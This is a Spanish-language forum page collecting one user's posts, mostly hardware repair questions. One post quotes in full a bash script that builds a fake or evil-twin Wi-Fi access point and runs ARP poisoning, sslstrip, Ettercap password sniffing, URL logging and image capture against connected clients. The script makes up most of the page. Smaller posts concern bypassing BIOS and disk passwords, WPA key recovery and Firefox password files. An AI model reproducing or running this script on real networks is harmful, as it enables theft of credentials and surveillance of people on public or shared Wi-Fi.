Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - kiabras

#1
el caso que tengo un    Packard Bell EASYNOTE_NJ31 y no se si a sido un virus o alguien de casa me a cogido el portatil resulta que me encontrado con contraseña en la BIOS e seguido los pasos de esta pagina http://dogber1.blogspot.com.br/2009/05/table-of-reverse-engineered-BIOS.html

i e conseguido la pasword de la BIOS lo que no consigo es el pasword del disco duro alguien tiene idea de como lo puedo recuperar el hash que me pone cuando pongo la contraseña mal  es  09157 la BIOS es    Phoenix Technologies LTD v0.3402 gracias
#2
buenas tengo un equipo hifi technics tiene la fuente de alimentacion mal cuando muevo la placa de la fuente aveces le llega la suficiente corriente e observado que un lado de la placa de la fuente esta negra mi duda es puedo sustituir la fuente i meterle una de pc en el conector de la placa del equipo donde va encajada la fuente pone esto +13,rs13v,cd13v,sync,dgnd,pwr,5v,vp,sa-vp,ac,ct,ac  podria soldar la de pc alguna patilla i que el el equipo funcionara. gracias
#3
buenas tengo un dell mini netbook i esta el conector roto el conector no es soldado hala placa conecta con un cable viene de la paca 2 cables negros i otros 2 rojos puedo cortar la cabeza del conector i empalmar los cables  al cargador ? la duda es que el conector tiene 4 cables el cargador 2 muchas gracias
#4
buenas tengo un soni vaio que se me a roto el conector dc tiene holgura y hai que moverlo el caso que este conector tiene 2 cables uno rojo y uno negro buscando por los caharros que tengo e encontrado un conector dc de compaq pero este tiene mas colores lo podria cambiar por este ? cual seria la conexion correta os dejo las fotos gracias

VAIO
https://www.dropbox.com/s/wfw0w5vgeq96xw2/dc%20vaio.jpg



COMPAQ

https://www.dropbox.com/s/kep2q4w9pvda100/dc%20compaq.jpg
#5
buenas tengo un compaq cq60. el problema es que de un dia para otro cada vez que arranco el portatil tengo que pulsar el boton del wifi. antes no me pasaba en windows no me preocupa mucho le doi i funciona pero en linux haun que le de al boton no funciona i tampoco las usb me pone radio desactivada como se soluciona gracias

edito: solucionado descargando HP Wireless Assistant y activando en el programa esta opcion Controles independientes para los dispositivos inalámbricos instalados
#6
Hardware / cambio de placa pantalla negra
11 Octubre 2013, 19:44 PM
e cambiado la placa base del pc por una nueva i cuando la conecto se accelera el ventilador pero me da pantalla negra le quitado las memorias i no pita que me puede estar pasando? gracias
#7
que hay que revisar en una placa base del portatil que no enciende ni luces ni gira el ventilador el cargador esta ok es necesario tirar la placa base o tienen arreglo?
#8
Mac OS X / como desabilito la tarjeta wifi interna?
3 Septiembre 2013, 21:14 PM
soi nuevo en mac i queria saber como se desabilitan los dispositivos en mac. en este caso las tarjetas de red i dejar la externa usb? gracias

es un imac snow leopard
#9
como lo hacen tengo curiosidad gracias
#10
Hardware / activar hdmi pc samsung
18 Junio 2013, 12:42 PM
buenas tengo un portatil samsung modelo -np-510 puedo activar el hdmi desde que arranca el pc esque lo pongo i me pone sin señal tengo. el flex del disco duro roto  uso de sistema wifixlax 4.4.5 esto ultimo lo digo por tema de draivers gracias
#11
como reparo esto se eschucha el sonido del pen pero no me aparece ni en equipo n en administrador de discos
#12
Hardware / portatil se me a caido
26 Abril 2013, 10:48 AM
tengo un acer aspire one se me a caido la pantalla no se ve rota ni manchas ni rajas pero solo se ilumina  no se ve nada e conectado el portatil a una pantalla exterior i funciona lo que no se si es el flex o la pantalla que opinan
#13
con baseband 04.11.08 vodafone.  que metodos hay para liverarlo gracias
#15
lo malo es que le tiembla mucho el pulso al camara
por lo demas estupendo programa
#16
cuando creo un roge ap el essid me cambia todo el rato halas redes que me rodean. el comando que uso es este airbase-ng -c  -e -a  -I 600 -0 mon0


-c Channel Flag

-C Seconds
-e <ESSID>

-A specifies ad-hoc mode

-i iface

lo e intentado tambien con este script pongo ap static pero se me cambia el essid es como si se asociara  halas redes que tengo a mi alcance i creara el ap falso



#!/bin/bash
# script coded by em3rgency
# 911_AP version 1.0
# xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
# This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
# Also includes workin ARP poisoning features.
# Tested and working on BT5r3, Needs to have version 1.3 of dhcp3-server to work correctly
# DOES NOT WORK with ISC-dhcp-server


#DEFINED COLOR SETTINGS
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)

echo ""
echo ""
echo ""
echo $RED"              +############################################+"
echo $RED"              +    em3rgency's Fake AP SSL MITM script     +"
echo $RED"              +                                            +"
echo $RED"              +                Version 1.0                 +"
echo $RED"              +                                            +"
echo $RED"              +           www.Top-Hat-Sec.com              +"
echo $RED"              +############################################+"
echo ""
echo $BLUE"     Visit http://www.top-hat-sec.com for updates to this script. Thanks"
echo ""
echo ""
sleep 3
clear

echo $BLUE"                    em3rgency's MITM script Version 1.0 !"
echo
echo $RED"              ************************************************";
echo $RED"              *    1.  Prerequsites and Updates              *";
echo $RED"              *    2.  Run FAKE AP Static                    *";
echo $RED"              *    3.  Run EVIL TWIN AP                      *";
echo $RED"              *    4.  Run Standard ARP poison               *";
echo $RED"              *    5.  Netdiscover connected clients         *";
echo $RED"              *    6.  EXIT                                  *";
echo $RED"              ************************************************";
echo ""

echo $BLUE"                          Select Menu Option:"
read menuoption
if [ $menuoption = "1" ]; then
clear
echo ""
echo $RED"                   **************************************";
echo $RED"                   *    1.  Run apt-get update          *";
echo $RED"                   *    2.  Run apt-get upgrade         *";
echo $RED"                   *    3.  Distribution upgrade        *";
echo $RED"                   *    4.  Install Dhcp3-server        *";
echo $RED"                   *    5.  Update aircrack-ng          *";
echo $RED"                   *    6.  Return to Main Menu         *";
echo $RED"                   **************************************";


echo $BLUE"                           Select Menu Option:"$STAND
read menuoption
if [ $menuoption = "1" ]; then

#This command will look for any upgrades to your OS distro.
sudo apt-get update
clear
./911_AP.sh
else

#This command will look for any upgrades to your OS distro.
if [ $menuoption = "2" ]; then
sudo apt-get upgrade
clear
./911_AP.sh
else

#This command will look for any distribution upgrades to your OS distro.
if [ $menuoption = "3" ]; then
sudo apt-get dist-upgrade  
clear
./911_AP.sh
else

#This command will Install DHCP3-server on BT5r3
if [ $menuoption = "4" ]; then
apt-get install dhcp3-server
clear
./911_AP.sh
else

#This command will update aircrack-ng to the latest nightly build
if [ $menuoption = "5" ]; then
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
svn co http://trac.aircrack-ng.org/svn/branch/airoscript-ng/ airoscript-ng
clear
else
if [ $menuoption = "6" ]; then
./911_AP.sh
fi
fi
fi
fi
fi
fi
else
if [ $menuoption = "2" ]; then
#This command will RUN The STATIC FAKE AP attack
sleep 2

# Configuring your Network interfaces
echo
echo $BLUE"                   [+] Lets get started shall we [+]"
echo $STAND""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear

echo $BLUE"              Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"             Configuring and Starting your FAKE Access Point...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo $BLUE"                       Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo $BLUE"                  Setting up DHCP to work with $ESSID...."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd3 -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dchpid=$!
sleep 3
echo ""

# SSLstrip
echo $BLUE"                Starting SSLstrip to enumerate user credentials...."
sudo xterm  -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# mkdir
echo $BLUE"            Creating /var/run/ettercap directory to save passwords...."
mkdir -p /var/run/ettercap
sleep 1
echo

# Ettercap
echo $BLUE"                  Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /var/run/ettercap/passwords.txt -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo $BLUE"           Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# Driftnet
echo $RED"        [##########################################################]"
echo $RED"        [    Do you want to run Driftnet to capture images???      ]"
echo $RED"        [             saved to /var/run/driftnetdata               ]"
echo $RED"        [                        Y or N                            ]"  
echo $RED"        [##########################################################]"


read DRIFT
echo ""

if [ $DRIFT = "y" ] ; then
mkdir -p "/var/run/driftnet/driftnetdata"
echo $BLUE"                Starting Driftnet to gather victims images."
driftnet -i $internet_interface -p -d /var/run/driftnet/driftnetdata & dritnetid=$!
sleep 3
fi

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"    ####################################################################"
echo $RED"    [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"    [                                                                  ]"
echo $RED"    [     Press Y THEN ENTERKEY to close kill and clean up the script  ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
echo ""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"$STAND
echo ''
sleep 2

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up      [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.top-hat-sec.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency           [+][+][+]"
sleep 5
exit

fi

sleep 3
clear

./911_AP.sh
else

# This command will RUN The EVIL TWIN AP attack
if [ $menuoption = "3" ]; then
sleep 3

# Configuring your Network interfaces
echo
echo $BLUE"                       [+] Lets get started shall we [+]"$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear

echo $BLUE"               Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"                     Configuring and Starting $ESSID...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo "                          Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo "                   Setting up DHCP to work with EVIL TWIN AP...."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd3 -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dchpid=$!
sleep 3
echo ""

# SSLstrip
echo "               Starting SSLstrip to enumerate user credentials...."
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# mkdir
echo "            Creating /var/run/ettercap directory to save passwords...."
mkdir -p /var/run/ettercap
sleep 1
echo

# Ettercap
echo "                 Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /var/run/ettercap/passwords.txt -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo "            Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# Driftnet
echo $RED"          [##########################################################]"
echo $RED"          [    Do you want to run Driftnet to capture images???      ]"
echo $RED"          [             saved to /var/run/driftnetdata               ]"
echo $RED"          [                        Y or N                            ]"  
echo $RED"          [##########################################################]"


read DRIFT
echo ""

if [ $DRIFT = "y" ] ; then
mkdir -p "/var/run/driftnet/driftnetdata"
echo "                Starting Driftnet to gather victims images."
driftnet -i $internet_interface -p -d /var/run/driftnet/driftnetdata & dritnetid=$!
sleep 3
fi

#SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"     ####################################################################"
echo $RED"     [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"     [                                                                  ]"
echo $RED"     [    Press Y THEN ENTERKEY to close kill and clean up the script   ]"
echo $RED"     [                                                                  ]"
echo $RED"     [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"     ####################################################################"
echo $STAND""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"
echo ''
sleep 2

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up      [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.top-hat-sec.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency           [+][+][+]"$STAND
sleep 5

fi

sleep 3
clear
./911_AP.sh
else

# Credits to N1t0g3n for the base to this section. Thanks bro
if [ $menuoption = "4" ]; then
clear
echo ""
echo ""
echo $BLUE"                  Finding wireless and ethernet interfaces."$STAND
sleep 3
echo ""
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
echo ""
echo ""
echo "Please type the name of your wireless interface (wlan0): "
read WIFACE
sleep 2
echo ""
echo ""
echo "Please type the name of your ethernet interface (eth0): "
read ETH0
clear
echo ""
echo ""
clear
echo $RED"              **************************************************";
echo $RED"              *    1.  Attack entire Gateway through LAN       *";
echo $RED"              *    2.  Attack entire Gateway through Wireless  *";
echo $RED"              *    3.  Attack single host through LAN          *";
echo $RED"              *    4.  Attack single host through Wireless     *";
echo $RED"              *    5.  Return to Main Menu                     *";
echo $RED"              **************************************************";
echo $STAND""
echo ""
echo $BLUE"                           Select Menu Option: "
read menuoption
if [ $menuoption = "1" ]; then
echo
echo
echo "                This should be your Gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your Gateway in below: "$STAND
read GATEWAY
echo $BLUE"                         Starting attack on Gateway"
echo ""
echo ""
echo "                   Passwords will show up in ettercap window"
sleep 3
echo "1" > /proc/sys/net/ipv4/ip_forward

#  PORT redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -e urlsnarf -i $ETH0 &
sleep 2

# Ettercap
xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -e tail -f sslstrip.log &
sleep 2



clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "2" ]; then
#This will allow you to forward packets from the router
echo $BLUE"              This should be your gateway from what I see: "$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $BLUE"Please type the IP of your gateway: "$STAND
read GATEWAY
echo $BLUE"                      Starting attack on gateway"
echo ""
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3


echo "1" > /proc/sys/net/ipv4/ip_forward


# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Etterap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "3" ]; then
#This will allow you to forward packets from the router
echo ""
echo ""
echo $BLUE"              This should be your gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY3
echo ""
echo ""
echo "Please type the IP of the target host: "
read HOST3
echo ""
echo $BLUE"                      Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -e urlsnarf -i $ETH0 &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "4" ]; then
echo ""
echo ""
echo $BLUE"This should be your Gateway from what I see: "
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY4
echo ""
echo "Please type the IP of the target host: "
read HOST4
echo ""
echo $BLUE"                     Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward


# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
clear

echo $RED"                Invalid option, you must choose 1,2,3,4 or 5.."
sleep 2
echo $BLUE"                          Re-Launching Script..."
./911_AP.sh
fi
fi
fi
fi
if [ $menuoption = "5" ]; then
./911_AP.sh
fi
else
if [ $menuoption = "5" ]; then
# A script to quickly tell whose on your network in real time.
clear
echo $BLUE"           This will show all The clients connected to The network"
echo ""
sleep 3
clear
echo
echo
echo $STAND"Please type the name of your network interface Example: eth0 "
read IFACE;
echo ""
echo ""
echo "               This should be your gateway from what I see: "
route -n -A inet | grep UG
sleep 1
echo ""
echo ""
echo $STAND"Please type in the IP address of your gateway"
read GATEWAY;
sleep 2
clear
echo ""
echo ""
echo ""
echo $BLUE"                   Press CTRL C to stop close netdiscover"
sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24  
echo ""
echo ""
echo $RED"    ####################################################################"
echo $RED"    [           em3rgency's Netdiscover script is now running          ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY
clear
./911_AP.sh

else
if [ $menuoption = "6" ]; then
exit
fi
fi
fi
fi
fi
fi
#17
se puede recuperar una clave cambiada con el ataque de diccionario del wlanreaver.


por si hay dudas esta encriptacion la uso cuando conecto mi ds lite.
el ruter es mio la clave la la tengo. solo pregunto si se puede recuperar la clave cambiada con el ataque de diccionario del wlanreaver
#18
Hacking Wireless / duda wlanreaver
25 Febrero 2013, 22:59 PM
la duda es la siguiente si el ataque dicionario del wlanreaver sirve con la clave cambiada? gracias

Títulos descriptivos y no eso. Ya llevas posts para saber las normas
#19
Este es el mensaje:

"hola amigo me puede facilitar el codigo o contenido del archivo perfiles de mozillafirexfox esta ubicado en
%APPDATA%\Mozilla\Firefox\Profiles

es para analizar su funcionamiento"

creo que hay se guardan las contraseñas no?

#20
Hardware / aprovechar procesador de portatil?
26 Enero 2013, 15:49 PM
buenas queria saber si puedo aprovechar este procesador si venden placa base de sobremesa    es de un portatil  socket rpga-998 procesador intel i5-430m gracias
#21
como instalo net frametword 3.5  en windows embedido e elejido la plantilla internet explorer windows media  remote desktop?
#22
Windows / que windows necesito para un ciber?
14 Noviembre 2012, 15:43 PM
buenas quiero montar un ciber. como funciona las licencias de windows. cual tendria que comprar para unos 22 ordenadores. a ver si me podeis asesorar gracias
#23
Desarrollo Web / pregunta dominio y wix
14 Noviembre 2012, 11:49 AM
buenas tengo un dominio en goodady i tengo un wix que no soi premium se puede vincular mi dominio a wix sin ser premium en wix gracias
#24
Hardware / pantalla negra imac 2006
16 Octubre 2012, 10:23 AM
me han traido un imac del 2006. cuento lo que le pasa al principio lo encendia no hacia el ruido de inicio ni da señal en la pantalla. e conseguido que haga el sonido pero la pantalla sigue en negro que le puede pasar. gracias de ante mano
#25
buenas intento recuperar mi clave wpa con wireleskeyview i las web me las muestra bien pero las wpa me salen de esta forma  24a553b1f56c5b896d440d7b50d666d9921266dff56beaa7c8fe99bc73c09cef

gracias
#26
Electrónica / television petido
26 Agosto 2012, 15:30 PM
el otro dia estuve pintando cuando acabe  enchufe la tele ala corriente i pego un petido i haora no enciende no se enciende ningun led. que le puede pasar es una samsung pantalla plana e pensado cambiar el fusible alguien que le haya pasado aver si me puede asesorar un poco gracias

el fusible que lleva la tele lo e comprobado con un tester i esta roto tengo otro no se si le valdria este es el de la tele 250v t63h  i el que encontrado es de 250v t2,5ah
#28
Foro Libre / por que Curiosity ....
6 Agosto 2012, 20:34 PM
le dura la bateria de 6 a 18 años i a mi movil 1 dia?
#29
tengo un  hp data messenger que esta en frances lo quiero pasar a español pero me pasa esto




se puede modificar la dll para saltarme  la deteccion de id del producto esta es la dll

http://sdrv.ms/N5889M  gracias
#31
buenas quiero aprender a hacer reballing a ordenadores portatiles esta maquina me servirá?  http://www.mod-center.com/b2c/index.php?page=pp_producto.php&md=0&ref=MRBPL


que cosas mas me haran falta?  gracias   

#32
mi hermano me a cojido el tester no tenia pila cuadrada de 9v i se le ocurrio cojer un cargador de nokia que pone outpud 3,7  le pelo los cable i lo conecto al multimetro i no se si lo abra roto hasta mañana no puedo comprar pilas 
#33
buenas como puedo ser root en youwave para poder usar titanium backup i despues instalar wasuup en tablet version de youwve 2.2.2?

lo e solucionado con mibackup pro
#34
necesito ver el backup de mi iphone que hizo itunes  tengo los contactos hay metidos.
se puede sincronizar los contactos sin sincronizar las apps ya que si sincronizo todo luego el iphone no me arranca por algun fallo de alguna app

edito: e sacado los contactos con iphone backup extractor en expermode i luego e usado SQLite Manager
#36
estoi intentando instalar xp en un airis kira que venia con xp me reconoce el disco duro pero al comprovar disco me pone el programa de instalacion ha determinado que la unidad c: esta dañada y no se puede reparar . yo digo no esta dañada por que le instalo ubuntu sin problemas windows 7 sin problemas en un eepc tambien me ha pasado.
